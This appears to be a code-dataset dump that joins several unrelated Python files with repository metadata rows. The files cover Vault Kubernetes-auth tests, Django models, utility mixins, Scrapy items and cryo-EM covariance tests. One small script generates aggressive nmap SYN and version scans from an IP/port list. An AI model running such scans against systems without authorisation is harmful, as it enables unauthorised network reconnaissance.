'token_reviewer_jwt': ''
},
'lease_duration': 0,
'lease_id': '',
'renewable': False,
'request_id': '12687b5f-b4f5-2ba4-aae2-2a8d7e53ca55',
'warnings': None,
'wrap_info': None
}
mock_url = 'http://localhost:8200/v1/auth/{0}/config'.format(
'kubernetes' if mount_point is None else mount_point,
)
requests_mocker.register_uri(
method='GET',
url=mock_url,
status_code=expected_status_code,
json=mock_response,
)
client = Client()
test_arguments = dict()
if mount_point:
test_arguments['mount_point'] = mount_point
actual_response = client.get_kubernetes_configuration(**test_arguments)
self.assertEqual(
first=mock_response,
second=actual_response,
)
@parameterized.expand([
("default mount point", None, "application1", '*', 'some-namespace'),
("custom mount point", "k8s", "application2", 'some-service-account', '*'),
])
@requests_mock.Mocker()
def test_create_role(self, test_label, mount_point, role_name, bound_service_account_names, bound_service_account_namespaces, requests_mocker):
expected_status_code = 204
mock_url = 'http://localhost:8200/v1/auth/{0}/role/{1}'.format(
'kubernetes' if mount_point is None else mount_point,
role_name,
)
requests_mocker.register_uri(
method='POST',
url=mock_url,
status_code=expected_status_code,
)
client = Client()
test_arguments = dict(
name=role_name,
bound_service_account_names=bound_service_account_names,
bound_service_account_namespaces=bound_service_account_namespaces,
)
if mount_point:
test_arguments['mount_point'] = mount_point
actual_response = client.create_kubernetes_role(**test_arguments)
self.assertEquals(
first=expected_status_code,
second=actual_response.status_code,
)
@parameterized.expand([
("default mount point", None, "application1"),
("custom mount point", "k8s", "application2"),
])
@requests_mock.Mocker()
def test_get_role(self, test_label, mount_point, role_name, requests_mocker):
expected_status_code = 200
mock_response = {
"auth": None,
"data": {
"bind_secret_id": True,
"bound_cidr_list": "",
"period": 0,
"policies": [
"default"
],
"secret_id_num_uses": 0,
"secret_id_ttl": 0,
"token_max_ttl": 900,
"token_num_uses": 0,
"token_ttl": 600
},
"lease_duration": 0,
"lease_id": "",
"renewable": False,
"request_id": "0aab655f-ecd2-b3d4-3817-35b5bdfd3f28",
"warnings": None,
"wrap_info": None
}
mock_url = 'http://localhost:8200/v1/auth/{0}/role/{1}'.format(
'kubernetes' if mount_point is None else mount_point,
role_name,
)
requests_mocker.register_uri(
method='GET',
url=mock_url,
status_code=expected_status_code,
json=mock_response,
)
client = Client()
test_arguments = dict(
name=role_name,
)
if mount_point:
test_arguments['mount_point'] = mount_point
actual_response = client.get_kubernetes_role(**test_arguments)
self.assertEquals(
first=mock_response,
second=actual_response,
)
@parameterized.expand([
("default mount point", None, ['test-role-1', 'test-role-2']),
("custom mount point", "k8s", ['test-role']),
])
@requests_mock.Mocker()
def test_list_kubernetes_roles(self, test_label, mount_point, role_names, requests_mocker):
expected_status_code = 200
mock_response = {
"auth": None,
"data": {
"keys": role_names,
},
"lease_duration": 0,
"lease_id": "",
"renewable": False,
"request_id": "e4c219fb-0a78-2be2-8d3c-b3715dccb920",
"warnings": None,
"wrap_info": None
}
mock_url = 'http://localhost:8200/v1/auth/{0}/role?list=true'.format(
'kubernetes' if mount_point is None else mount_point,
)
requests_mocker.register_uri(
method='GET',
url=mock_url,
status_code=expected_status_code,
json=mock_response,
)
client = Client()
test_arguments = dict()
if mount_point:
test_arguments['mount_point'] = mount_point
actual_response = client.list_kubernetes_roles(**test_arguments)
# ensure we received our mock response data back successfully
self.assertEqual(mock_response, actual_response)
@parameterized.expand([
("default mount point", None, "application1"),
("custom mount point", "k8s", "application2"),
])
@requests_mock.Mocker()
def test_delete_kubernetes_role(self, test_label, mount_point, role_name, requests_mocker):
expected_status_code = 204
mock_url = 'http://localhost:8200/v1/auth/{0}/role/{1}'.format(
'kubernetes' if mount_point is None else mount_point,
role_name,
)
requests_mocker.register_uri(
method='DELETE',
url=mock_url,
status_code=expected_status_code,
)
client = Client()
test_arguments = dict(
role=role_name,
)
if mount_point:
test_arguments['mount_point'] = mount_point
actual_response = client.delete_kubernetes_role(**test_arguments)
self.assertEquals(
first=expected_status_code,
second=actual_response.status_code,
)
@parameterized.expand([
("default mount point", "custom_role", "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9", None),
("custom mount point", "custom_role", "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9", "gcp-not-default")
])
@requests_mock.Mocker()
def test_auth_kubernetes(self, test_label, test_role, test_jwt, mount_point, requests_mocker):
mock_response = {
'auth': {
'accessor': 'accessor-1234-5678-9012-345678901234',
'client_token': 'cltoken-1234-5678-9012-345678901234',
'lease_duration': 10000,
'metadata': {
'role': 'custom_role',
'service_account_name': 'vault-auth',
'service_account_namespace': 'default',
'service_account_secret_name': 'vault-auth-token-pd21c',
'service_account_uid': 'aa9aa8ff-98d0-11e7-9bb7-0800276d99bf'
},
'policies': [
'default',
'custom_role'
],
'renewable': True
},
'data': None,
'lease_duration': 0,
'lease_id': '',
'renewable': False,
'request_id': 'requesti-1234-5678-9012-345678901234',
'warnings': [],
'wrap_info': None
}
mock_url = 'http://localhost:8200/v1/auth/{0}/login'.format(
'kubernetes' if mount_point is None else mount_point)
requests_mocker.register_uri(
method='POST',
url=mock_url,
json=mock_response
)
client = Client()
test_arguments = dict(
role=test_role,
jwt=test_jwt,
)
if mount_point:
test_arguments['mount_point'] = mount_point
actual_response = client.auth_kubernetes(**test_arguments)
# ensure we received our mock response data back successfully
self.assertEqual(mock_response, actual_response)
| 34.517123 | 147 | 0.571188 | 1,006 | 10,079 | 5.421471 | 0.157058 | 0.102677 | 0.049505 | 0.039787 | 0.761276 | 0.724789 | 0.693986 | 0.671617 | 0.648882 | 0.59571 | 0 | 0.039064 | 0.321857 | 10,079 | 291 | 148 | 34.635739 | 0.758888 | 0.020042 | 0 | 0.573077 | 0 | 0 | 0.2 | 0.040223 | 0 | 0 | 0 | 0 | 0.026923 | 1 | 0.026923 | false | 0 | 0.015385 | 0 | 0.046154 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7856542a78848ad39b3fdf129fb9aed087356444 | 400 | py | Python | login/migrations/0002_auto_20200404_2123.py | bbsddn2020/django-user-LinHai-v1.0 | b4f1d4c38f9a98d850358eb0dfd93502a2d42907 | [
"MIT"
] | null | null | null | login/migrations/0002_auto_20200404_2123.py | bbsddn2020/django-user-LinHai-v1.0 | b4f1d4c38f9a98d850358eb0dfd93502a2d42907 | [
"MIT"
] | 8 | 2021-03-19T01:39:43.000Z | 2022-03-12T00:22:19.000Z | login/migrations/0002_auto_20200404_2123.py | bbsddn2020/django-user-LinHai-v1.0 | b4f1d4c38f9a98d850358eb0dfd93502a2d42907 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.4 on 2020-04-04 13:23
from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('login', '0001_initial'),
    ]

    operations = [
        migrations.AlterField(
            model_name='user',
            name='c_time',
            field=models.DateTimeField(auto_now_add=True, verbose_name='注册时间'),
        ),
    ]
| 21.052632 | 79 | 0.6 | 45 | 400 | 5.2 | 0.822222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.065972 | 0.28 | 400 | 18 | 80 | 22.222222 | 0.746528 | 0.1125 | 0 | 0 | 1 | 0 | 0.087819 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7859f91bde5be0e471228aaf20e69559dc908a81 | 2,484 | py | Python | script/util/MixIn.py | demetoir/MLtools | 8c42fcd4cc71728333d9c116ade639fe57d50d37 | [
"MIT"
] | null | null | null | script/util/MixIn.py | demetoir/MLtools | 8c42fcd4cc71728333d9c116ade639fe57d50d37 | [
"MIT"
] | null | null | null | script/util/MixIn.py | demetoir/MLtools | 8c42fcd4cc71728333d9c116ade639fe57d50d37 | [
"MIT"
] | null | null | null | from multiprocessing.pool import Pool
from script.util.Logger import Logger
from script.util.misc_util import dump_pickle, load_pickle, dump_json, load_json
class LoggerMixIn:
def __init__(self, verbose=0):
self.verbose = verbose
@property
def log(self):
level = Logger.verbose_to_level(self.verbose)
return Logger(self.__class__.__name__, level=level)
class PickleSelfMixIn:
def dump(self, path):
dump_pickle(self, path)
def load(self, path):
load_obj = load_pickle(path)
if load_obj.__class__ is not self.__class__:
raise TypeError(f"load obj is not {load_obj.__class__} is not match with expected class {self.__class__}")
new_obj = self.__class__()
for key, items in load_obj.__dict__.items():
setattr(new_obj, key, items)
return new_obj
def to_pickle(self, path, **kwargs):
dump_pickle(self, path)
def from_pickle(self, path, overwrite_self=False, **kwargs):
load_obj = load_pickle(path)
# for auto detect pickle type
if load_obj.__class__ is not self.__class__:
raise TypeError(f"load obj is not {load_obj.__class__} is not match with expected class {self.__class__}")
new_obj = self.__class__()
for key, items in load_obj.__dict__.items():
setattr(new_obj, key, items)
if overwrite_self:
for key, val in new_obj.__dict__.items():
self.__dict__[key] = val
return new_obj
class PickleMixIn:
@staticmethod
def to_pickle(obj, path):
dump_pickle(obj, path)
@staticmethod
def from_pickle(path):
return load_pickle(path)
class JsonMixIn:
@staticmethod
def _dump_json(obj, path):
dump_json(obj, path)
@staticmethod
def _load_json(path):
return load_json(path)
def from_json(self, path):
return self._load_json(path)
def to_json(self, obj, path):
self._dump_json(obj, path)
class singletonPoolMixIn:
_pool_singleton = None
_n_job = None
def __init__(self, n_job=1):
self.__class__._n_job = n_job
@property
def pool(self):
if self.__class__._pool_singleton is None:
self.__class__._pool_singleton = Pool(
processes=self.__class__._n_job)
return self.__class__._pool_singleton
| 27.910112 | 119 | 0.629227 | 317 | 2,484 | 4.444795 | 0.192429 | 0.07665 | 0.039745 | 0.039745 | 0.298084 | 0.238467 | 0.238467 | 0.238467 | 0.238467 | 0.238467 | 0 | 0.001129 | 0.287037 | 2,484 | 88 | 120 | 28.227273 | 0.794466 | 0.01087 | 0 | 0.349206 | 0 | 0 | 0.072666 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.047619 | 0.047619 | 0.492063 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
78631bb24e50a8426b5da59ee2705af3b943ad83 | 361 | py | Python | exceptions.py | udartsev/django-geodata | 945cac06dd8010733225f7adb0536443cc5ebac6 | [
"MIT"
] | null | null | null | exceptions.py | udartsev/django-geodata | 945cac06dd8010733225f7adb0536443cc5ebac6 | [
"MIT"
] | null | null | null | exceptions.py | udartsev/django-geodata | 945cac06dd8010733225f7adb0536443cc5ebac6 | [
"MIT"
] | null | null | null | class BaseServerException(Exception):
def __init__(self, detail, status_code, message):
super().__init__(message)
self.detail = detail
self.status_code = status_code
class SearchFieldRequiered(BaseServerException):
def __init__(self):
super().__init__(detail='entity', status_code=404, message='Search field required')
| 32.818182 | 91 | 0.714681 | 38 | 361 | 6.263158 | 0.447368 | 0.168067 | 0.092437 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010135 | 0.180055 | 361 | 10 | 92 | 36.1 | 0.793919 | 0 | 0 | 0 | 0 | 0 | 0.074792 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7864fa9e3feb65d8c57f4031a9b8d6c91a5790ce | 269 | py | Python | stackoverflow/spiders/items.py | Janeho454199/stackoverflow-spider | 6d60fc2d19d22cfeccdb8bca4aa144f3b633850c | [
"MIT"
] | 131 | 2018-03-17T14:59:47.000Z | 2022-03-23T02:36:56.000Z | stackoverflow/spiders/items.py | Janeho454199/stackoverflow-spider | 6d60fc2d19d22cfeccdb8bca4aa144f3b633850c | [
"MIT"
] | 18 | 2019-02-13T09:15:25.000Z | 2021-12-09T21:32:13.000Z | stackoverflow/spiders/items.py | Janeho454199/stackoverflow-spider | 6d60fc2d19d22cfeccdb8bca4aa144f3b633850c | [
"MIT"
] | 54 | 2018-03-25T03:30:34.000Z | 2022-03-23T02:36:58.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import scrapy
class StackoverflowItem(scrapy.Item):
links = scrapy.Field()
views = scrapy.Field()
votes = scrapy.Field()
answers = scrapy.Field()
tags = scrapy.Field()
questions = scrapy.Field()
| 17.933333 | 37 | 0.63197 | 31 | 269 | 5.483871 | 0.612903 | 0.388235 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004717 | 0.211896 | 269 | 14 | 38 | 19.214286 | 0.79717 | 0.156134 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
786a7c8d7a83b054334be66c769984509fe218e8 | 9,774 | py | Python | tests/test_covar.py | ComputationalCryoEM/ASPIRE | 6e6699eae532874de44b98adb7ddb2ad96c43d9d | [
"MIT"
] | null | null | null | tests/test_covar.py | ComputationalCryoEM/ASPIRE | 6e6699eae532874de44b98adb7ddb2ad96c43d9d | [
"MIT"
] | 5 | 2019-06-07T13:25:29.000Z | 2019-06-18T20:34:37.000Z | tests/test_covar.py | computationalcryoem/aspyre | 6e6699eae532874de44b98adb7ddb2ad96c43d9d | [
"MIT"
] | 1 | 2019-06-18T17:41:52.000Z | 2019-06-18T17:41:52.000Z | import os
import numpy as np
from scipy.cluster.vq import kmeans2
from unittest import TestCase
from unittest.mock import patch
import pytest
from aspyre.source import SourceFilter
from aspyre.source.simulation import Simulation
from aspyre.basis.fb_3d import FBBasis3D
from aspyre.imaging.filters import RadialCTFFilter
from aspyre.estimation.mean import MeanEstimator
from aspyre.estimation.covar import CovarianceEstimator
from aspyre.utils.matrix import eigs
from aspyre.utils.misc import src_wiener_coords
from aspyre.utils.matlab_compat import Random
import os.path
DATA_DIR = os.path.join(os.path.dirname(__file__), 'saved_test_data')
class CovarianceTestCase(TestCase):
    @classmethod
    def setUpClass(cls):
        cls.sim = Simulation(
            n=1024,
            filters=SourceFilter(
                [RadialCTFFilter(defocus=d) for d in np.linspace(1.5e4, 2.5e4, 7)],
                n=1024
            )
        )
        basis = FBBasis3D((8, 8, 8))
        cls.noise_variance = 0.0030762743633643615
        cls.mean_estimator = MeanEstimator(cls.sim, basis)
        cls.mean_est = np.load(os.path.join(DATA_DIR, 'mean_8_8_8.npy'))

        # Passing in a mean_kernel argument to the following constructor speeds up some calculations
        cls.covar_estimator = CovarianceEstimator(cls.sim, basis, mean_kernel=cls.mean_estimator.kernel, preconditioner='none')
        cls.covar_estimator_with_preconditioner = CovarianceEstimator(cls.sim, basis, mean_kernel=cls.mean_estimator.kernel, preconditioner='circulant')

    def tearDown(self):
        pass

    @pytest.mark.expensive
    def testCovariance(self):
        covar_est = self.covar_estimator_with_preconditioner.estimate(self.mean_est, self.noise_variance)
        self.assertTrue(np.allclose(
            np.array([
                [0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, -4.97200141e-17, 0.00000000e+00, 0.00000000e+00, 0.00000000e+00],
                [0.00000000e+00, 0.00000000e+00, -1.12423131e-02, -7.82940670e-03, -5.25730644e-02, -5.12982911e-02, 5.46448594e-03, 0.00000000e+00],
                [0.00000000e+00, -1.45263802e-02, 1.74773651e-02, 2.37465013e-02, -5.82802387e-02, -2.18693634e-02, -8.17610441e-03, -5.34913194e-02],
                [0.00000000e+00, -1.25388002e-02, 3.32579746e-02, -2.47232520e-02, -1.45779671e-01, -9.90902473e-02, -1.21664500e-01, -1.86567008e-01],
                [5.23168570e-17, 1.48361175e-02, 6.39768940e-02, 2.31061220e-01, 1.14505159e-01, -1.27282900e-01, -1.20426781e-01, -9.83754536e-02],
                [0.00000000e+00, -2.77886166e-02, -2.70706646e-02, 3.27305040e-01, 3.52852148e-01, 1.95510582e-03, -5.53571860e-02, -2.08399248e-02],
                [0.00000000e+00, -2.60699879e-02, -1.84686293e-02, 1.30268283e-01, 1.36522253e-01, 8.11090183e-02, 3.50443711e-02, -1.21283276e-02],
                [0.00000000e+00, 0.00000000e+00, 6.67517637e-02, 1.12721933e-01, -8.87693429e-03, 2.99613531e-02, 4.14024319e-02, 0.00000000e+00]
            ]),
            covar_est[:, :, 4, 4, 4, 4],
            atol=1e-4
        ))

    @patch('scipy.sparse.linalg.cg')
    def testCovariance1(self, cg):
        cg_return_value = np.load(os.path.join(DATA_DIR, 'cg_return_value.npy'))
        cg.return_value = cg_return_value, 0  # 0 = convergence success
        covar_est = self.covar_estimator.estimate(self.mean_est, self.noise_variance)

        # Since we're only mocking a linear system solver, ensure that we did return the solution
        # for the argument we got called with.
        # 'call_args' is a tuple with the first member being the ordered arguments of the Mock call
        # In our case (in order) - the LinearOperator and 'b' (the RHS of the linear system)
        op, b = cg.call_args[0]
        self.assertTrue(np.allclose(b, op(cg_return_value), atol=1e-5))

        self.assertTrue(np.allclose(
            np.array([
                [0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, -4.97200141e-17, 0.00000000e+00, 0.00000000e+00, 0.00000000e+00],
                [0.00000000e+00, 0.00000000e+00, -1.12423131e-02, -7.82940670e-03, -5.25730644e-02, -5.12982911e-02, 5.46448594e-03, 0.00000000e+00],
                [0.00000000e+00, -1.45263802e-02, 1.74773651e-02, 2.37465013e-02, -5.82802387e-02, -2.18693634e-02, -8.17610441e-03, -5.34913194e-02],
                [0.00000000e+00, -1.25388002e-02, 3.32579746e-02, -2.47232520e-02, -1.45779671e-01, -9.90902473e-02, -1.21664500e-01, -1.86567008e-01],
                [5.23168570e-17, 1.48361175e-02, 6.39768940e-02, 2.31061220e-01, 1.14505159e-01, -1.27282900e-01, -1.20426781e-01, -9.83754536e-02],
                [0.00000000e+00, -2.77886166e-02, -2.70706646e-02, 3.27305040e-01, 3.52852148e-01, 1.95510582e-03, -5.53571860e-02, -2.08399248e-02],
                [0.00000000e+00, -2.60699879e-02, -1.84686293e-02, 1.30268283e-01, 1.36522253e-01, 8.11090183e-02, 3.50443711e-02, -1.21283276e-02],
                [0.00000000e+00, 0.00000000e+00, 6.67517637e-02, 1.12721933e-01, -8.87693429e-03, 2.99613531e-02, 4.14024319e-02, 0.00000000e+00]
            ]),
            covar_est[:, :, 4, 4, 4, 4],
            atol=1e-4
        ))

    @patch('scipy.sparse.linalg.cg')
    def testCovariance2(self, cg):
        # Essentially the same as above, except that our estimator now has a preconditioner
        cg_return_value = np.load(os.path.join(DATA_DIR, 'cg_return_value.npy'))
        cg.return_value = cg_return_value, 0  # 0 = convergence success
        covar_est = self.covar_estimator_with_preconditioner.estimate(self.mean_est, self.noise_variance)

        self.assertTrue(np.allclose(
            np.array([
                [0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, -4.97200141e-17, 0.00000000e+00, 0.00000000e+00, 0.00000000e+00],
                [0.00000000e+00, 0.00000000e+00, -1.12423131e-02, -7.82940670e-03, -5.25730644e-02, -5.12982911e-02, 5.46448594e-03, 0.00000000e+00],
                [0.00000000e+00, -1.45263802e-02, 1.74773651e-02, 2.37465013e-02, -5.82802387e-02, -2.18693634e-02, -8.17610441e-03, -5.34913194e-02],
                [0.00000000e+00, -1.25388002e-02, 3.32579746e-02, -2.47232520e-02, -1.45779671e-01, -9.90902473e-02, -1.21664500e-01, -1.86567008e-01],
                [5.23168570e-17, 1.48361175e-02, 6.39768940e-02, 2.31061220e-01, 1.14505159e-01, -1.27282900e-01, -1.20426781e-01, -9.83754536e-02],
                [0.00000000e+00, -2.77886166e-02, -2.70706646e-02, 3.27305040e-01, 3.52852148e-01, 1.95510582e-03, -5.53571860e-02, -2.08399248e-02],
                [0.00000000e+00, -2.60699879e-02, -1.84686293e-02, 1.30268283e-01, 1.36522253e-01, 8.11090183e-02, 3.50443711e-02, -1.21283276e-02],
                [0.00000000e+00, 0.00000000e+00, 6.67517637e-02, 1.12721933e-01, -8.87693429e-03, 2.99613531e-02, 4.14024319e-02, 0.00000000e+00]
            ]),
            covar_est[:, :, 4, 4, 4, 4],
            atol=1e-4
        ))

    def testMeanEvaluation(self):
        metrics = self.sim.eval_mean(self.mean_est)
        self.assertAlmostEqual(2.6641160559507631, metrics['err'], places=4)
        self.assertAlmostEqual(0.17659437048516261, metrics['rel_err'], places=4)
        self.assertAlmostEqual(0.9849211540734224, metrics['corr'], places=4)

    def testCovarEvaluation(self):
        covar_est = np.load(os.path.join(DATA_DIR, 'covar_8_8_8_8_8_8.npy'))
        metrics = self.sim.eval_covar(covar_est)
        self.assertAlmostEqual(13.322721549011165, metrics['err'], places=4)
        self.assertAlmostEqual(0.59589360739385577, metrics['rel_err'], places=4)
        self.assertAlmostEqual(0.84053472877416313, metrics['corr'], places=4)

    def testEigsEvaluation(self):
        covar_est = np.load(os.path.join(DATA_DIR, 'covar_8_8_8_8_8_8.npy'))
        eigs_est, lambdas_est = eigs(covar_est, 16)

        # No. of distinct volumes
        C = 2

        # Eigenvalues and their corresponding eigenvectors are returned in descending order
        # We take the highest C-1 entries, since C-1 is the rank of the population covariance matrix.
        eigs_est_trunc = eigs_est[:, :, :, :C-1]
        lambdas_est_trunc = lambdas_est[:C-1, :C-1]

        metrics = self.sim.eval_eigs(eigs_est_trunc, lambdas_est_trunc)
        self.assertAlmostEqual(13.09420492368651, metrics['err'], places=4)
        self.assertAlmostEqual(0.58567250265489856, metrics['rel_err'], places=4)
        self.assertAlmostEqual(0.85473300555263432, metrics['corr'], places=4)

    def testClustering(self):
        covar_est = np.load(os.path.join(DATA_DIR, 'covar_8_8_8_8_8_8.npy'))
        eigs_est, lambdas_est = eigs(covar_est, 16)

        C = 2
        eigs_est_trunc = eigs_est[:, :, :, :C-1]
        lambdas_est_trunc = lambdas_est[:C-1, :C-1]

        # Estimate the coordinates in the eigenbasis. Given the images, we find the coordinates in the basis that
        # minimize the mean squared error, given the (estimated) covariances of the volumes and the noise process.
        coords_est = src_wiener_coords(self.sim, self.mean_est, eigs_est_trunc, lambdas_est_trunc, self.noise_variance)

        # Cluster the coordinates using k-means. Again, we know how many volumes we expect, so we can use this parameter
        # here. Typically, one would take the number of clusters to be one plus the number of eigenvectors extracted.
        # Since kmeans2 relies on randomness for initialization, important to push random seed to context manager here.
        with Random(0):
            centers, vol_idx = kmeans2(coords_est.T, C)

        clustering_accuracy = self.sim.eval_clustering(vol_idx)
        self.assertEqual(clustering_accuracy, 1)
| 57.83432 | 152 | 0.661756 | 1,403 | 9,774 | 4.513899 | 0.213115 | 0.080531 | 0.096637 | 0.055424 | 0.597031 | 0.587084 | 0.587084 | 0.553134 | 0.529133 | 0.529133 | 0 | 0.307514 | 0.206159 | 9,774 | 168 | 153 | 58.178571 | 0.5087 | 0.1283 | 0 | 0.491935 | 0 | 0 | 0.026932 | 0.012584 | 0 | 0 | 0 | 0 | 0.112903 | 1 | 0.072581 | false | 0.008065 | 0.129032 | 0 | 0.209677 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7870afd916a5ff1b2cfabce4e171321789b079fb | 820 | py | Python | preference/models.py | ASL-19/outline-distribution | 6ef595d59c0d7d9416cd1d3c0fb263ba83830126 | [
"Apache-2.0"
] | 5 | 2020-12-21T21:19:28.000Z | 2022-03-28T00:53:45.000Z | preference/models.py | ASL-19/outline-distribution | 6ef595d59c0d7d9416cd1d3c0fb263ba83830126 | [
"Apache-2.0"
] | 5 | 2021-01-07T02:32:47.000Z | 2022-03-28T14:28:52.000Z | preference/models.py | ASL-19/outline-distribution | 6ef595d59c0d7d9416cd1d3c0fb263ba83830126 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 ASL19 Organization
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from django.db import models


class Region(models.Model):
    """
    Class to store different Regions for
    landing page
    """
    name = models.CharField(
        max_length=128)

    def __str__(self):
        return self.name
| 27.333333 | 74 | 0.72439 | 119 | 820 | 4.94958 | 0.714286 | 0.101868 | 0.044143 | 0.054329 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019969 | 0.206098 | 820 | 29 | 75 | 28.275862 | 0.884793 | 0.739024 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.166667 | 0.166667 | 0.833333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
78730c4c34562140b4aa13d567d8e6bd4a0cbb65 | 784 | py | Python | deprecated/ipport-list-to-script-nmap-portgroup-cmds.py | NullByte8080/ipport | fedee1ab956d8d0327b3572c67ebc5b945419aae | [
"MIT"
] | 10 | 2016-11-24T17:36:10.000Z | 2022-02-22T03:06:16.000Z | deprecated/ipport-list-to-script-nmap-portgroup-cmds.py | NullByte8080/ipport | fedee1ab956d8d0327b3572c67ebc5b945419aae | [
"MIT"
] | null | null | null | deprecated/ipport-list-to-script-nmap-portgroup-cmds.py | NullByte8080/ipport | fedee1ab956d8d0327b3572c67ebc5b945419aae | [
"MIT"
] | 4 | 2017-09-07T03:11:12.000Z | 2020-10-17T17:55:18.000Z | #!/usr/bin/env python
'''
convert ip port list nmap commands sorrounded in script statements
'''
import sys,re
if len(sys.argv) > 1:
filename = sys.argv[1]
else:
sys.stderr.write('Usage: '+sys.argv[0]+' <in-file>\n')
sys.exit(1)
ips = []
ports = dict()
for ip,port in map(lambda x: x.split(), filter(lambda x: re.match(r'^([0-9\.]+)\s*([0-9]+)$',x) != None, open(filename).read().strip().split('\n'))):
if ip not in ips:
ips += [ip]
if ip not in ports.keys():
ports[ip] = []
ports[ip] += [port]
for ip in ips:
#screen = 'screen -d -m -S '+ip+'-nmap-tcp-discovered '
print 'script -f -c \'nmap -Pn -vv -A -sS --version-all -p'+','.join(ports[ip])+' -oA '+ip+'-nmap-tcp-discovered '+ip+'\' '+ip+'-nmap-tcp-discovered.log'
# ^ -sS / -sT
| 31.36 | 154 | 0.570153 | 130 | 784 | 3.438462 | 0.523077 | 0.040268 | 0.060403 | 0.127517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012559 | 0.1875 | 784 | 24 | 155 | 32.666667 | 0.689168 | 0.153061 | 0 | 0 | 0 | 0 | 0.18569 | 0.080068 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.0625 | null | null | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7878dfadb37ab9ac5e636612f7783f3e1751ae64 | 3,370 | py | Python | app/db/repositories/user.py | Max-Zhenzhera/my_vocab_backend | f93d0c7c7f4a45fce47eb7ce74cfcda195b13a72 | [
"MIT"
] | 1 | 2021-11-18T16:25:22.000Z | 2021-11-18T16:25:22.000Z | app/db/repositories/user.py | Max-Zhenzhera/my_vocab_backend | f93d0c7c7f4a45fce47eb7ce74cfcda195b13a72 | [
"MIT"
] | null | null | null | app/db/repositories/user.py | Max-Zhenzhera/my_vocab_backend | f93d0c7c7f4a45fce47eb7ce74cfcda195b13a72 | [
"MIT"
] | null | null | null | from datetime import datetime
from uuid import uuid4
from typing import (
ClassVar,
TypeVar,
Union
)
from sqlalchemy import update as sa_update
from sqlalchemy.future import select as sa_select
from sqlalchemy.sql.elements import BinaryExpression
from .base import BaseRepository
from .types_ import ModelType
from ..errors import (
EmailInUpdateIsAlreadyTakenError,
EntityDoesNotExistError
)
from ..models import User
